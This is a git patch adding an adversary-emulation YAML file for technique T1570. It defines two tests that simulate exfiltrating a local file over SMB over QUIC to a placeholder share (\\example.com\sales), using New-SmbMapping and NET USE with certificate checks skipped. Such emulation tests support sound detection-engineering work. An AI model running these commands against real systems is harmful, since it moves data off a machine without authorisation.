From d01ecdbd4b5abec8174628b29b53ce7e2b350da7 Mon Sep 17 00:00:00 2001
From: Michael Haag <5632822+MHaggis@users.noreply.github.com>
Date: Tue, 11 Jul 2023 20:59:08 -0600
Subject: [PATCH] Create T1570.yaml (#2476)

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1570/T1570.yaml | 51 ++++++++++++++++++++++++++++++++++++++++
 1 file changed, 51 insertions(+)
 create mode 100644 atomics/T1570/T1570.yaml

diff --git a/atomics/T1570/T1570.yaml b/atomics/T1570/T1570.yaml
new file mode 100644
index 00000000..88af5696
--- /dev/null
+++ b/atomics/T1570/T1570.yaml
@@ -0,0 +1,51 @@
+attack_technique: T1570
+display_name: 'Lateral Tool Transfer'
+atomic_tests:
+- name: Exfiltration Over SMB over QUIC (New-SmbMapping)
+  description: |
+    Simulates an attacker exfiltrating data over SMB over QUIC using the New-SmbMapping command.
+    Prerequisites:
+      - A file server running Windows Server 2022 Datacenter: Azure Edition
+      - A Windows 11 computer
+      - Windows Admin Center
+  supported_platforms:
+    - windows
+  input_arguments:
+    remote_path:
+      description: The UNC path to the share on the file server
+      type: string
+      default: '\\example.com\sales'
+    local_file:
+      description: The local file to be transferred
+      type: path
+      default: 'C:\path\to\file.txt'
+  executor:
+    command: |
+      New-SmbMapping -RemotePath '#{remote_path}' -TransportType QUIC -SkipCertificateCheck
+      copy '#{local_file}' 'Z:\'
+    name: powershell
+    elevation_required: true
+- name: Exfiltration Over SMB over QUIC (NET USE)
+  description: |
+    Simulates an attacker exfiltrating data over SMB over QUIC using the NET USE command.
+    Prerequisites:
+      - A file server running Windows Server 2022 Datacenter: Azure Edition
+      - A Windows 11 computer
+      - Windows Admin Center
+  supported_platforms:
+    - windows
+  input_arguments:
+    remote_path:
+      description: The UNC path to the share on the file server
+      type: string
+      default: '\\example.com\sales'
+    local_file:
+      description: The local file to be transferred
+      type: path
+      default: 'C:\path\to\file.txt'
+  executor:
+    command: |
+      NET USE * '#{remote_path}' /TRANSPORT:QUIC /SKIPCERTCHECK
+      copy '#{local_file}' '*:\'
+    name: powershell
+    elevation_required: true